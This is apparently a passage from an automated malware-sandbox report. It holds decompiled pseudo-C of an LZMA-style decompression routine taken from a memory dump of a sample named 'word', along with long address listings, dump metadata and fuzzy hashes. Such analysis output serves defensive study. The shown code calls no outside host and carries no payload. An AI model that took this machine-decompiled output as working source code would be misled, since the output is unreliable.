                                      												__eax =  *(__ebp - 0x68);
                                      												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                      												_t283 = __ebp - 0x64;
                                      												 *_t283 =  *(__ebp - 0x64) - 1;
                                      												__eflags =  *_t283;
                                      												 *( *(__ebp - 0x68)) = __cl;
                                      												L79:
                                      												 *(__ebp - 0x14) = __edx;
                                      												goto L80;
                                      											case 0x1c:
                                      												while(1) {
                                      													L123:
                                      													__eflags =  *(__ebp - 0x64);
                                      													if( *(__ebp - 0x64) == 0) {
                                      														break;
                                      													}
                                      													__eax =  *(__ebp - 0x14);
                                      													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                      													__eflags = __eax -  *(__ebp - 0x74);
                                      													if(__eax >=  *(__ebp - 0x74)) {
                                      														__eax = __eax +  *(__ebp - 0x74);
                                      														__eflags = __eax;
                                      													}
                                      													__edx =  *(__ebp - 8);
                                      													__cl =  *(__eax + __edx);
                                      													__eax =  *(__ebp - 0x14);
                                      													 *(__ebp - 0x5c) = __cl;
                                      													 *(__eax + __edx) = __cl;
                                      													__eax = __eax + 1;
                                      													__edx = 0;
                                      													_t414 = __eax %  *(__ebp - 0x74);
                                      													__eax = __eax /  *(__ebp - 0x74);
                                      													__edx = _t414;
                                      													__eax =  *(__ebp - 0x68);
                                      													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                      													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                      													__eflags =  *(__ebp - 0x30);
                                      													 *( *(__ebp - 0x68)) = __cl;
                                      													 *(__ebp - 0x14) = _t414;
                                      													if( *(__ebp - 0x30) > 0) {
                                      														continue;
                                      													} else {
                                      														L80:
                                      														 *(__ebp - 0x88) = 2;
                                      														goto L1;
                                      													}
                                      												}
                                      												 *(__ebp - 0x88) = 0x1c;
                                      												goto L170;
                                      										}
                                      									}
                                      									L171:
                                      									_t544 = _t543 | 0xffffffff;
                                      									goto L172;
                                      								}
                                      							}
                                      						}
                                      					}
                                      					goto L1;
                                      				}
                                      			}














                                      0x00000000
                                      0x00406ffe
                                      0x00406ffe
                                      0x00407002
                                      0x00407023
                                      0x0040702a
                                      0x00407030
                                      0x00407036
                                      0x00407048
                                      0x0040704e
                                      0x00407053
                                      0x00000000
                                      0x00407004
                                      0x0040700a
                                      0x004073cb
                                      0x004073cb
                                      0x004073cb
                                      0x004073ce
                                      0x004073ce
                                      0x004073ce
                                      0x004073d4
                                      0x004073da
                                      0x004073e0
                                      0x004073fa
                                      0x004073fd
                                      0x00407403
                                      0x0040740e
                                      0x00407410
                                      0x004073e2
                                      0x004073e2
                                      0x004073f1
                                      0x004073f5
                                      0x004073f5
                                      0x0040741a
                                      0x00000000
                                      0x00000000
                                      0x0040741c
                                      0x00407420
                                      0x004075cf
                                      0x004075e5
                                      0x004075ed
                                      0x004075f4
                                      0x004075f6
                                      0x004075fd
                                      0x00407601
                                      0x00407601
                                      0x0040742c
                                      0x00407433
                                      0x0040743b
                                      0x0040743e
                                      0x00407441
                                      0x00407441
                                      0x00407447
                                      0x00407447
                                      0x00406be3
                                      0x00406be3
                                      0x00406be3
                                      0x00406bec
                                      0x00000000
                                      0x00000000
                                      0x00406bf2
                                      0x00000000
                                      0x00406bfd
                                      0x00000000
                                      0x00000000
                                      0x00406c06
                                      0x00406c09
                                      0x00406c0c
                                      0x00406c10
                                      0x00000000
                                      0x00000000
                                      0x00406c16
                                      0x00406c19
                                      0x00406c1b
                                      0x00406c1c
                                      0x00406c1f
                                      0x00406c21
                                      0x00406c22
                                      0x00406c24
                                      0x00406c27
                                      0x00406c2c
                                      0x00406c31
                                      0x00406c3a
                                      0x00406c4d
                                      0x00406c50
                                      0x00406c5c
                                      0x00406c84
                                      0x00406c86
                                      0x00406c94
                                      0x00406c94
                                      0x00406c98
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406c88
                                      0x00406c88
                                      0x00406c8b
                                      0x00406c8c
                                      0x00406c8c
                                      0x00000000
                                      0x00406c88
                                      0x00406c62
                                      0x00406c67
                                      0x00406c67
                                      0x00406c70
                                      0x00406c78
                                      0x00406c7b
                                      0x00000000
                                      0x00406c81
                                      0x00406c81
                                      0x00000000
                                      0x00406c81
                                      0x00000000
                                      0x00406c9e
                                      0x00406c9e
                                      0x00406ca2
                                      0x0040754e
                                      0x00000000
                                      0x0040754e
                                      0x00406cab
                                      0x00406cbb
                                      0x00406cbe
                                      0x00406cc1
                                      0x00406cc1
                                      0x00406cc1
                                      0x00406cc4
                                      0x00406cc8
                                      0x00000000
                                      0x00000000
                                      0x00406cca
                                      0x00406cd0
                                      0x00406cfa
                                      0x00406d00
                                      0x00406d07
                                      0x00000000
                                      0x00406d07
                                      0x00406cd6
                                      0x00406cd9
                                      0x00406cde
                                      0x00406cde
                                      0x00406ce9
                                      0x00406cf1
                                      0x00406cf4
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406d39
                                      0x00406d3f
                                      0x00406d42
                                      0x00406d4f
                                      0x00406d57
                                      0x00000000
                                      0x00000000
                                      0x00406d0e
                                      0x00406d0e
                                      0x00406d12
                                      0x0040755d
                                      0x00000000
                                      0x0040755d
                                      0x00406d1e
                                      0x00406d29
                                      0x00406d29
                                      0x00406d29
                                      0x00406d2c
                                      0x00406d2f
                                      0x00406d32
                                      0x00406d37
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004073ce
                                      0x004073ce
                                      0x004073d4
                                      0x004073da
                                      0x004073e0
                                      0x004073fa
                                      0x004073fd
                                      0x00407403
                                      0x0040740e
                                      0x00407410
                                      0x004073e2
                                      0x004073e2
                                      0x004073f1
                                      0x004073f5
                                      0x004073f5
                                      0x0040741a
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406d5f
                                      0x00406d61
                                      0x00406d64
                                      0x00406dd5
                                      0x00406dd8
                                      0x00406ddb
                                      0x00406de2
                                      0x00406dec
                                      0x004073cb
                                      0x004073cb
                                      0x00000000
                                      0x004073cb
                                      0x00406d66
                                      0x00406d6a
                                      0x00406d6d
                                      0x00406d6f
                                      0x00406d72
                                      0x00406d75
                                      0x00406d77
                                      0x00406d7a
                                      0x00406d7c
                                      0x00406d81
                                      0x00406d84
                                      0x00406d87
                                      0x00406d8b
                                      0x00406d92
                                      0x00406d95
                                      0x00406d9c
                                      0x00406da0
                                      0x00406da8
                                      0x00406da8
                                      0x00406da8
                                      0x00406da2
                                      0x00406da2
                                      0x00406da2
                                      0x00406d97
                                      0x00406d97
                                      0x00406d97
                                      0x00406dac
                                      0x00406daf
                                      0x00406dcd
                                      0x00406dcf
                                      0x00000000
                                      0x00406db1
                                      0x00406db1
                                      0x00406db4
                                      0x00406db7
                                      0x00406dba
                                      0x00406dbc
                                      0x00406dbc
                                      0x00406dbc
                                      0x00406dbf
                                      0x00406dc2
                                      0x00406dc4
                                      0x00406dc5
                                      0x00406dc8
                                      0x00000000
                                      0x00406dc8
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00407068
                                      0x0040706c
                                      0x0040708f
                                      0x00407092
                                      0x00407095
                                      0x0040709f
                                      0x0040706e
                                      0x0040706e
                                      0x00407071
                                      0x00407074
                                      0x00407077
                                      0x00407084
                                      0x00407087
                                      0x00407087
                                      0x004073cb
                                      0x004073cb
                                      0x004073cb
                                      0x00000000
                                      0x004073cb
                                      0x00000000
                                      0x004070ab
                                      0x004070af
                                      0x00000000
                                      0x00000000
                                      0x004070b5
                                      0x004070b9
                                      0x00000000
                                      0x00000000
                                      0x004070bf
                                      0x004070c1
                                      0x004070c5
                                      0x004070c5
                                      0x004070c8
                                      0x004070cc
                                      0x00000000
                                      0x00000000
                                      0x0040711c
                                      0x00407120
                                      0x00407127
                                      0x0040712a
                                      0x0040712d
                                      0x00407137
                                      0x004073cb
                                      0x004073cb
                                      0x004073cb
                                      0x00000000
                                      0x004073cb
                                      0x004073cb
                                      0x00407122
                                      0x00000000
                                      0x00000000
                                      0x00407143
                                      0x00407147
                                      0x0040714e
                                      0x00407151
                                      0x00407154
                                      0x00407149
                                      0x00407149
                                      0x00407149
                                      0x00407157
                                      0x0040715a
                                      0x0040715d
                                      0x0040715d
                                      0x00407160
                                      0x00407163
                                      0x00407166
                                      0x00407166
                                      0x00407169
                                      0x00407170
                                      0x00407175
                                      0x00000000
                                      0x00000000
                                      0x00407203
                                      0x00407203
                                      0x00407207
                                      0x004075a5
                                      0x00000000
                                      0x004075a5
                                      0x0040720d
                                      0x00407210
                                      0x00407213
                                      0x00407217
                                      0x0040721a
                                      0x00407220
                                      0x00407222
                                      0x00407222
                                      0x00407222
                                      0x00407225
                                      0x00407228
                                      0x00000000
                                      0x00000000
                                      0x00406df8
                                      0x00406df8
                                      0x00406dfc
                                      0x00407569
                                      0x00000000
                                      0x00407569
                                      0x00406e02
                                      0x00406e05
                                      0x00406e08
                                      0x00406e0c
                                      0x00406e0f
                                      0x00406e15
                                      0x00406e17
                                      0x00406e17
                                      0x00406e17
                                      0x00406e1a
                                      0x00406e1d
                                      0x00406e1d
                                      0x00406e20
                                      0x00406e23
                                      0x00000000
                                      0x00000000
                                      0x00406e29
                                      0x00406e2f
                                      0x00000000
                                      0x00000000
                                      0x00406e35
                                      0x00406e35
                                      0x00406e39
                                      0x00406e3c
                                      0x00406e3f
                                      0x00406e42
                                      0x00406e45
                                      0x00406e46
                                      0x00406e49
                                      0x00406e4b
                                      0x00406e51
                                      0x00406e54
                                      0x00406e57
                                      0x00406e5a
                                      0x00406e5d
                                      0x00406e60
                                      0x00406e63
                                      0x00406e7f
                                      0x00406e82
                                      0x00406e85
                                      0x00406e88
                                      0x00406e8f
                                      0x00406e93
                                      0x00406e95
                                      0x00406e99
                                      0x00406e65
                                      0x00406e65
                                      0x00406e69
                                      0x00406e71
                                      0x00406e76
                                      0x00406e78
                                      0x00406e7a
                                      0x00406e7a
                                      0x00406e9c
                                      0x00406ea3
                                      0x00406ea6
                                      0x00000000
                                      0x00406eac
                                      0x00000000
                                      0x00406eac
                                      0x00000000
                                      0x00406eb1
                                      0x00406eb1
                                      0x00406eb5
                                      0x00407575
                                      0x00000000
                                      0x00407575
                                      0x00406ebb
                                      0x00406ebe
                                      0x00406ec1
                                      0x00406ec5
                                      0x00406ec8
                                      0x00406ece
                                      0x00406ed0
                                      0x00406ed0
                                      0x00406ed0
                                      0x00406ed3
                                      0x00406ed6
                                      0x00406ed6
                                      0x00406ed6
                                      0x00406edc
                                      0x00000000
                                      0x00000000
                                      0x00406ede
                                      0x00406ee1
                                      0x00406ee4
                                      0x00406ee7
                                      0x00406eea
                                      0x00406eed
                                      0x00406ef0
                                      0x00406ef3
                                      0x00406ef6
                                      0x00406ef9
                                      0x00406efc
                                      0x00406f14
                                      0x00406f17
                                      0x00406f1a
                                      0x00406f1d
                                      0x00406f1d
                                      0x00406f20
                                      0x00406f24
                                      0x00406f26
                                      0x00406efe
                                      0x00406efe
                                      0x00406f06
                                      0x00406f0b
                                      0x00406f0d
                                      0x00406f0f
                                      0x00406f0f
                                      0x00406f29
                                      0x00406f30
                                      0x00406f33
                                      0x00000000
                                      0x00406f35
                                      0x00000000
                                      0x00406f35
                                      0x00406f33
                                      0x00406f3a
                                      0x00406f3a
                                      0x00406f3a
                                      0x00406f3a
                                      0x00000000
                                      0x00000000
                                      0x00406f75
                                      0x00406f75
                                      0x00406f79
                                      0x00407581
                                      0x00000000
                                      0x00407581
                                      0x00406f7f
                                      0x00406f82
                                      0x00406f85
                                      0x00406f89
                                      0x00406f8c
                                      0x00406f92
                                      0x00406f94
                                      0x00406f94
                                      0x00406f94
                                      0x00406f97
                                      0x00406f9a
                                      0x00406f9a
                                      0x00406fa0
                                      0x00406f3e
                                      0x00406f3e
                                      0x00406f41
                                      0x00000000
                                      0x00406f41
                                      0x00406fa2
                                      0x00406fa2
                                      0x00406fa5
                                      0x00406fa8
                                      0x00406fab
                                      0x00406fae
                                      0x00406fb1
                                      0x00406fb4
                                      0x00406fb7
                                      0x00406fba
                                      0x00406fbd
                                      0x00406fc0
                                      0x00406fd8
                                      0x00406fdb
                                      0x00406fde
                                      0x00406fe1
                                      0x00406fe1
                                      0x00406fe4
                                      0x00406fe8
                                      0x00406fea
                                      0x00406fc2
                                      0x00406fc2
                                      0x00406fca
                                      0x00406fcf
                                      0x00406fd1
                                      0x00406fd3
                                      0x00406fd3
                                      0x00406fed
                                      0x00406ff4
                                      0x00406ff7
                                      0x00000000
                                      0x00406ff9
                                      0x00000000
                                      0x00406ff9
                                      0x00000000
                                      0x00407286
                                      0x00407286
                                      0x0040728a
                                      0x004075b1
                                      0x00000000
                                      0x004075b1
                                      0x00407290
                                      0x00407293
                                      0x00407296
                                      0x0040729a
                                      0x0040729d
                                      0x004072a3
                                      0x004072a5
                                      0x004072a5
                                      0x004072a5
                                      0x004072a8
                                      0x00000000
                                      0x00000000
                                      0x00407056
                                      0x00407056
                                      0x00407059
                                      0x004073cb
                                      0x004073cb
                                      0x004073cb
                                      0x00000000
                                      0x004073cb
                                      0x00000000
                                      0x00407395
                                      0x00407399
                                      0x004073bb
                                      0x004073be
                                      0x004073c8
                                      0x004073cb
                                      0x004073cb
                                      0x004073cb
                                      0x00000000
                                      0x004073cb
                                      0x004073cb
                                      0x0040739b
                                      0x0040739e
                                      0x004073a2
                                      0x004073a5
                                      0x004073a5
                                      0x004073a8
                                      0x00000000
                                      0x00000000
                                      0x00407452
                                      0x00407456
                                      0x00407474
                                      0x00407474
                                      0x00407474
                                      0x0040747b
                                      0x00407482
                                      0x00407489
                                      0x00407489
                                      0x00000000
                                      0x00407489
                                      0x00407458
                                      0x0040745b
                                      0x0040745e
                                      0x00407461
                                      0x00407468
                                      0x004073ac
                                      0x004073ac
                                      0x004073af
                                      0x00000000
                                      0x00000000
                                      0x00407543
                                      0x00407546
                                      0x00407447
                                      0x00000000
                                      0x00000000
                                      0x0040717d
                                      0x0040717f
                                      0x00407186
                                      0x00407187
                                      0x00407189
                                      0x0040718c
                                      0x00000000
                                      0x00000000
                                      0x00407194
                                      0x00407197
                                      0x0040719a
                                      0x0040719c
                                      0x0040719e
                                      0x0040719e
                                      0x0040719f
                                      0x004071a2
                                      0x004071a9
                                      0x004071ac
                                      0x004071ba
                                      0x00000000
                                      0x00000000
                                      0x00407490
                                      0x00407490
                                      0x00407493
                                      0x0040749a
                                      0x00000000
                                      0x00000000
                                      0x0040749f
                                      0x0040749f
                                      0x004074a3
                                      0x004075db
                                      0x00000000
                                      0x004075db
                                      0x004074a9
                                      0x004074ac
                                      0x004074af
                                      0x004074b3
                                      0x004074b6
                                      0x004074bc
                                      0x004074be
                                      0x004074be
                                      0x004074be
                                      0x004074c1
                                      0x004074c4
                                      0x004074c4
                                      0x004074c4
                                      0x004074c4
                                      0x004074c7
                                      0x004074c7
                                      0x004074cb
                                      0x0040752b
                                      0x0040752e
                                      0x00407533
                                      0x00407534
                                      0x00407536
                                      0x00407538
                                      0x0040753b
                                      0x00407447
                                      0x00407447
                                      0x00000000
                                      0x0040744d
                                      0x00407447
                                      0x004074cd
                                      0x004074d3
                                      0x004074d6
                                      0x004074d9
                                      0x004074dc
                                      0x004074df
                                      0x004074e2
                                      0x004074e5
                                      0x004074e8
                                      0x004074eb
                                      0x004074ee
                                      0x00407507
                                      0x0040750a
                                      0x0040750d
                                      0x00407510
                                      0x00407514
                                      0x00407516
                                      0x00407516
                                      0x00407517
                                      0x0040751a
                                      0x004074f0
                                      0x004074f0
                                      0x004074f8
                                      0x004074fd
                                      0x004074ff
                                      0x00407502
                                      0x00407502
                                      0x0040751d
                                      0x00407524
                                      0x00000000
                                      0x00407526
                                      0x00000000
                                      0x00407526
                                      0x00000000
                                      0x004071c2
                                      0x004071c5
                                      0x004071fb
                                      0x0040732b
                                      0x0040732b
                                      0x0040732b
                                      0x0040732b
                                      0x0040732e
                                      0x0040732e
                                      0x00407331
                                      0x00407333
                                      0x004075bd
                                      0x00000000
                                      0x004075bd
                                      0x00407339
                                      0x0040733c
                                      0x00000000
                                      0x00000000
                                      0x00407342
                                      0x00407346
                                      0x00407349
                                      0x00407349
                                      0x00407349
                                      0x00000000
                                      0x00407349
                                      0x004071c7
                                      0x004071c9
                                      0x004071cb
                                      0x004071cd
                                      0x004071d0
                                      0x004071d1
                                      0x004071d3
                                      0x004071d5
                                      0x004071d8
                                      0x004071db
                                      0x004071f1
                                      0x004071f6
                                      0x0040722e
                                      0x0040722e
                                      0x00407232
                                      0x0040725e
                                      0x00407260
                                      0x00407267
                                      0x0040726a
                                      0x0040726d
                                      0x0040726d
                                      0x00407272
                                      0x00407272
                                      0x00407274
                                      0x00407277
                                      0x0040727e
                                      0x00407281
                                      0x004072ae
                                      0x004072ae
                                      0x004072b1
                                      0x004072b4
                                      0x00407328
                                      0x00407328
                                      0x00407328
                                      0x00000000
                                      0x00407328
                                      0x004072b6
                                      0x004072bc
                                      0x004072bf
                                      0x004072c2
                                      0x004072c5
                                      0x004072c8
                                      0x004072cb
                                      0x004072ce
                                      0x004072d1
                                      0x004072d4
                                      0x004072d7
                                      0x004072f0
                                      0x004072f2
                                      0x004072f5
                                      0x004072f6
                                      0x004072f9
                                      0x004072fb
                                      0x004072fe
                                      0x00407300
                                      0x00407302
                                      0x00407305
                                      0x00407307
                                      0x0040730a
                                      0x0040730e
                                      0x00407310
                                      0x00407310
                                      0x00407311
                                      0x00407314
                                      0x00407317
                                      0x004072d9
                                      0x004072d9
                                      0x004072e1
                                      0x004072e6
                                      0x004072e8
                                      0x004072eb
                                      0x004072eb
                                      0x0040731a
                                      0x00407321
                                      0x004072ab
                                      0x004072ab
                                      0x004072ab
                                      0x004072ab
                                      0x00000000
                                      0x00407323
                                      0x00000000
                                      0x00407323
                                      0x00407321
                                      0x00407234
                                      0x00407237
                                      0x00407239
                                      0x0040723c
                                      0x0040723f
                                      0x00407242
                                      0x00407244
                                      0x00407247
                                      0x0040724a
                                      0x0040724a
                                      0x0040724d
                                      0x0040724d
                                      0x00407250
                                      0x00407257
                                      0x0040722b
                                      0x0040722b
                                      0x0040722b
                                      0x0040722b
                                      0x00000000
                                      0x00407259
                                      0x00000000
                                      0x00407259
                                      0x00407257
                                      0x004071dd
                                      0x004071e0
                                      0x004071e2
                                      0x004071e5
                                      0x00000000
                                      0x00000000
                                      0x00406f44
                                      0x00406f44
                                      0x00406f48
                                      0x0040758d
                                      0x00000000
                                      0x0040758d
                                      0x00406f4e
                                      0x00406f51
                                      0x00406f54
                                      0x00406f57
                                      0x00406f5a
                                      0x00406f5d
                                      0x00406f60
                                      0x00406f62
                                      0x00406f65
                                      0x00406f68
                                      0x00406f6b
                                      0x00406f6d
                                      0x00406f6d
                                      0x00406f6d
                                      0x00000000
                                      0x00000000
                                      0x004070cf
                                      0x004070cf
                                      0x004070d3
                                      0x00407599
                                      0x00000000
                                      0x00407599
                                      0x004070d9
                                      0x004070dc
                                      0x004070df
                                      0x004070e2
                                      0x004070e4
                                      0x004070e4
                                      0x004070e4
                                      0x004070e7
                                      0x004070ea
                                      0x004070ed
                                      0x004070f0
                                      0x004070f3
                                      0x004070f6
                                      0x004070f7
                                      0x004070f9
                                      0x004070f9
                                      0x004070f9
                                      0x004070fc
                                      0x004070ff
                                      0x00407102
                                      0x00407105
                                      0x00407105
                                      0x00407105
                                      0x00407108
                                      0x0040710a
                                      0x0040710a
                                      0x00000000
                                      0x00000000
                                      0x0040734c
                                      0x0040734c
                                      0x0040734c
                                      0x00407350
                                      0x00000000
                                      0x00000000
                                      0x00407356
                                      0x00407359
                                      0x0040735c
                                      0x0040735f
                                      0x00407361
                                      0x00407361
                                      0x00407361
                                      0x00407364
                                      0x00407367
                                      0x0040736a
                                      0x0040736d
                                      0x00407370
                                      0x00407373
                                      0x00407374
                                      0x00407376
                                      0x00407376
                                      0x00407376
                                      0x00407379
                                      0x0040737c
                                      0x0040737f
                                      0x00407382
                                      0x00407385
                                      0x00407389
                                      0x0040738b
                                      0x0040738e
                                      0x00000000
                                      0x00407390
                                      0x0040710d
                                      0x0040710d
                                      0x00000000
                                      0x0040710d
                                      0x0040738e
                                      0x004075c3
                                      0x00000000
                                      0x00000000
                                      0x00406bf2
                                      0x004075fa
                                      0x004075fa
                                      0x00000000
                                      0x004075fa
                                      0x00407447
                                      0x004073ce
                                      0x004073cb
                                      0x00000000
                                      0x00407002

                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                      • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                                      • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                      • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 98%
                                      			E0040711C() {
                                      				unsigned short _t531;
                                      				signed int _t532;
                                      				void _t533;
                                      				signed int _t534;
                                      				signed int _t535;
                                      				signed int _t565;
                                      				signed int _t568;
                                      				signed int _t589;
                                      				signed int* _t606;
                                      				void* _t613;
                                      
                                      				L0:
                                      				while(1) {
                                      					L0:
                                      					if( *(_t613 - 0x40) != 0) {
                                      						 *(_t613 - 0x84) = 0xb;
                                      						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                                      						goto L132;
                                      					} else {
                                      						__eax =  *(__ebp - 0x28);
                                      						L88:
                                      						 *(__ebp - 0x2c) = __eax;
                                      						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                      						L89:
                                      						__eax =  *(__ebp - 4);
                                      						 *(__ebp - 0x80) = 0x15;
                                      						__eax =  *(__ebp - 4) + 0xa68;
                                      						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                      						L69:
                                      						 *(__ebp - 0x84) = 0x12;
                                      						while(1) {
                                      							L132:
                                      							 *(_t613 - 0x54) = _t606;
                                      							while(1) {
                                      								L133:
                                      								_t531 =  *_t606;
                                      								_t589 = _t531 & 0x0000ffff;
                                      								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                      								if( *(_t613 - 0xc) >= _t565) {
                                      									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                      									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                      									 *(_t613 - 0x40) = 1;
                                      									_t532 = _t531 - (_t531 >> 5);
                                      									 *_t606 = _t532;
                                      								} else {
                                      									 *(_t613 - 0x10) = _t565;
                                      									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                      									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                      								}
                                      								if( *(_t613 - 0x10) >= 0x1000000) {
                                      									goto L139;
                                      								}
                                      								L137:
                                      								if( *(_t613 - 0x6c) == 0) {
                                      									 *(_t613 - 0x88) = 5;
                                      									L170:
                                      									_t568 = 0x22;
                                      									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                      									_t535 = 0;
                                      									L172:
                                      									return _t535;
                                      								}
                                      								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                      								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                      								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                      								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                      								L139:
                                      								_t533 =  *(_t613 - 0x84);
                                      								while(1) {
                                      									 *(_t613 - 0x88) = _t533;
                                      									while(1) {
                                      										L1:
                                      										_t534 =  *(_t613 - 0x88);
                                      										if(_t534 > 0x1c) {
                                      											break;
                                      										}
                                      										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                      											case 0:
                                      												if( *(_t613 - 0x6c) == 0) {
                                      													goto L170;
                                      												}
                                      												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                      												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                      												_t534 =  *( *(_t613 - 0x70));
                                      												if(_t534 > 0xe1) {
                                      													goto L171;
                                      												}
                                      												_t538 = _t534 & 0x000000ff;
                                      												_push(0x2d);
                                      												asm("cdq");
                                      												_pop(_t570);
                                      												_push(9);
                                      												_pop(_t571);
                                      												_t609 = _t538 / _t570;
                                      												_t540 = _t538 % _t570 & 0x000000ff;
                                      												asm("cdq");
                                      												_t604 = _t540 % _t571 & 0x000000ff;
                                      												 *(_t613 - 0x3c) = _t604;
                                      												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                      												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                      												_t612 = (0x300 << _t604 + _t609) + 0x736;
                                      												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                      													L10:
                                      													if(_t612 == 0) {
                                      														L12:
                                      														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                      														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                      														goto L15;
                                      													} else {
                                      														goto L11;
                                      													}
                                      													do {
                                      														L11:
                                      														_t612 = _t612 - 1;
                                      														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                      													} while (_t612 != 0);
                                      													goto L12;
                                      												}
                                      												if( *(_t613 - 4) != 0) {
                                      													GlobalFree( *(_t613 - 4));
                                      												}
                                      												_t534 = GlobalAlloc(0x40, 0x600); // executed
                                      												 *(_t613 - 4) = _t534;
                                      												if(_t534 == 0) {
                                      													goto L171;
                                      												} else {
                                      													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                      													goto L10;
                                      												}
                                      											case 1:
                                      												L13:
                                      												__eflags =  *(_t613 - 0x6c);
                                      												if( *(_t613 - 0x6c) == 0) {
                                      													 *(_t613 - 0x88) = 1;
                                      													goto L170;
                                      												}
                                      												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                      												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                      												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                      												_t45 = _t613 - 0x48;
                                      												 *_t45 =  *(_t613 - 0x48) + 1;
                                      												__eflags =  *_t45;
                                      												L15:
                                      												if( *(_t613 - 0x48) < 4) {
                                      													goto L13;
                                      												}
                                      												_t546 =  *(_t613 - 0x40);
                                      												if(_t546 ==  *(_t613 - 0x74)) {
                                      													L20:
                                      													 *(_t613 - 0x48) = 5;
                                      													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                      													goto L23;
                                      												}
                                      												 *(_t613 - 0x74) = _t546;
                                      												if( *(_t613 - 8) != 0) {
                                      													GlobalFree( *(_t613 - 8));
                                      												}
                                      												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                      												 *(_t613 - 8) = _t534;
                                      												if(_t534 == 0) {
                                      													goto L171;
                                      												} else {
                                      													goto L20;
                                      												}
                                      											case 2:
                                      												L24:
                                      												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                      												 *(_t613 - 0x84) = 6;
                                      												 *(_t613 - 0x4c) = _t553;
                                      												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                      												L132:
                                      												 *(_t613 - 0x54) = _t606;
                                      												goto L133;
                                      											case 3:
                                      												L21:
                                      												__eflags =  *(_t613 - 0x6c);
                                      												if( *(_t613 - 0x6c) == 0) {
                                      													 *(_t613 - 0x88) = 3;
                                      													goto L170;
                                      												}
                                      												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                      												_t67 = _t613 - 0x70;
                                      												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                      												__eflags =  *_t67;
                                      												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                      												L23:
                                      												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                      												if( *(_t613 - 0x48) != 0) {
                                      													goto L21;
                                      												}
                                      												goto L24;
